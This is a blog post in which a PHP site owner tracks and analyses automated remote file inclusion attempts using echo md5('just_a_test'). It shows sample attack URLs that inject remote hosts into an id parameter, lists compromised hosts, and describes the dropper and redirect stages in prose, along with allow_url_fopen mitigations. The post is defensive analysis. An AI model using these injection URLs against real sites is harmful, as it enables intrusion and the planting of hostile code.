Catching and Preventing echo md5(“just_a_test”); exploit attempts

Have been noticing LOTS of automated explot attempts recently across my small portfolio of php sites.

The bots are replacing script.php?id=4 calls with urls like:

script.php?id=http://concorduae.com/oldtaifgate/articles/qozevuc/gofadur/
and
script.php?id=http://mslayouts.ws/icons/administrator/components/com_menus/aruyi/iyuxuyi/

All these landing pages have:

<?php echo md5("just_a_test");?>

on
them. If you have a browse around these obviously hacked sites there is
some other interesting code. eg:
http://concorduae.com/oldtaifgate/articles/qozevuc/

im changing a
script which gets hit a few times a day to actually see what the bot
will do when it finds the output from the echo md5() statement.


UPDATE:

Here’s what happens when the initial just_a_test exploit attempt is successful:

My
fake exploitable script was hit 7 times by the robots. Each hit was
from different ip addresses and using different compromised hosts for
the initial just_a_test remote file code. Each robot was presented with
the output from echo md5(“just_a_test”);

The robots didn’t seem
to do anything straight after seeing that the site was exploitable, but
8 hours later I received 60 hits from robots trying to inject a
different bit of code:
http://www.municipioxii.it/sunnyway/eheqebi/tigogo/a/ and http://www.cjp.spb.ru/en/tis/geze/a/ and so on.. (all ending in /a/ )

The time lapse between initial attempts and follow up attempts leads me
to believe that the initial robots communicate back to a central server
when they find an exploitable host. More robots are then scheduled to
come back to the exploitable host and try to move to the next level.

This
code file they were trying to inject contains a lot of white space with
some PHP code in the middle. Here’s the formated PHP code if you want
to have a look:

click to view step 2 code

Step 2 php code creates a new file with the contents from base64_decode. The file is called namogofer.php
and if tries to create this file in every directory under the document
root. When step 2 successfully creates a file on the server it will
ouput a tab separated list of information about where the file is
loaced, and continue. The contents of the namogofer.php file which get
written to the web server are here:

click to view step 3 code

As
you can see Step 3 code is waiting for a special file upload. The next
round of attacks will involve uploading another php file to the server
in the form of a normal file upload. The code will be dumped in the
/tmp directory like all file uploads are, and then the code will be
eval()’d

I’ll update again once I catch the uploaded code.


UPDATE:

I’m
seeing about 100 hits a day and growing on this topic. If anybody knows
the true nature of this exploit attempt or how so many websites have
been compromised tell me about it and i’ll post it here. dtbaker @
gmail. com


UPDATE:

More compromised hosts (2008-02-06):

http://www.heaven-house.kz/templates_c/sexes/afacub/
http://www.felixtorresycia.com/admin/correo/enaq/ecib/
http://sans-packing.ru/img/jipeqap/ehudute/
http://www.thoseguysfilms.com/forums/templates/subSilver/images/uza/laqipu/
http://www.soeasywebsite.com/soeasycasino/ixu/xotem/
http://honamfishing.co.kr/phpmysqladmin/libraries/oduzov/neloze/
http://www.municipioxii.it/sunnyway/eheqebi/jahibop/
http://www.asigurareamea.ro/upload_fisiere/agihixu/bezodan/
http://www.obrasmecanicasch.com/omch/img/itofu/viroja/

 


UPDATE:

From Jonathan Dill

Digging through web logs, there has been a surge in this type of
activity lately, but it appears to be run of the mill index.php
attempted remote file inclusion exploit, as long as you have PHP
configured with allow_url_fopen = ‘off’ you should be OK. Newer PHP
uses a “wrapper” which allows you to restrict what can be included, or
you can recode to use cURL instead of url_fopen.

Here are some relevant articles:

http://www.ciac.org/ciac/techbull/CIACTech08-001.shtml

Docs from PHP website:
http://us2.php.net/filesystem

See also:
http://phpsec.org/projects/phpsecinfo/tests/allow_url_fopen.html

Recommendations

You should disable allow_url_fopen in the php.ini file:

; Disable allow_url_fopen for security reasons
allow_url_fopen = ‘off’

The setting can also be disabled in apache’s httpd.conf file:

# Disable allow_url_fopen for security reasons
php_flag allow_url_fopen off

For remote file access, consider using the cURL functions that PHP provides.


UPDATE:

I have made a number of scripts output echo md5(“just_a_test”); when they see these automated exploit attempts.
Hopefully I will catch one soon and will be able to see what the next step in the remote file inclusion exploit is.�


UPDATE:

Mark: some info about WordPress and this exploit: http://news.go41.de/events/php-echo-md5-just_a_test-what-is-that/

Mark: a .htaccess snippet that stops url’s from being passed into any scripts: http://news.go41.de/events/md5-just_a_test-htaccess-solution/
(not sure if this will affect any legit stuff – do any popular
wordpress etc.. scripts require url’s to be passed as parameters -like
referral link counters etc…)

 


UPDATE:

I have received quite a few emails from people who have had their servers compromised by this attack.

Seems the overall goal of this attack is to infect .htaccess and javascript
files with as little impact on normal website functionality as
possible. When visitors navigate to the infected site via search
engines the users browsing experience is altered so the attacker can
build revenue from PPC vendors.

[snip]

Our server seems to have been exploited by this code.
The payload seemed to be a redirection script that takes any search referrals
from Google, Yahoo, etc and then creates a pseudo blog page promoting some paid
advertising where the blog owner gets a commission on the clicks.

The PPC vendor is (in this instance) PeakClick www.peakclick.com. They don’t appear
to be involved in this.

[/snip]

For
those who are digging around – you can find and report straight to the
PPC vendors and request for them to disabled the accounts of the user
who is exploiting this attack.

Will post some infected javascript snippets soon.

Leave a Reply

Your email address will not be published. Required fields are marked *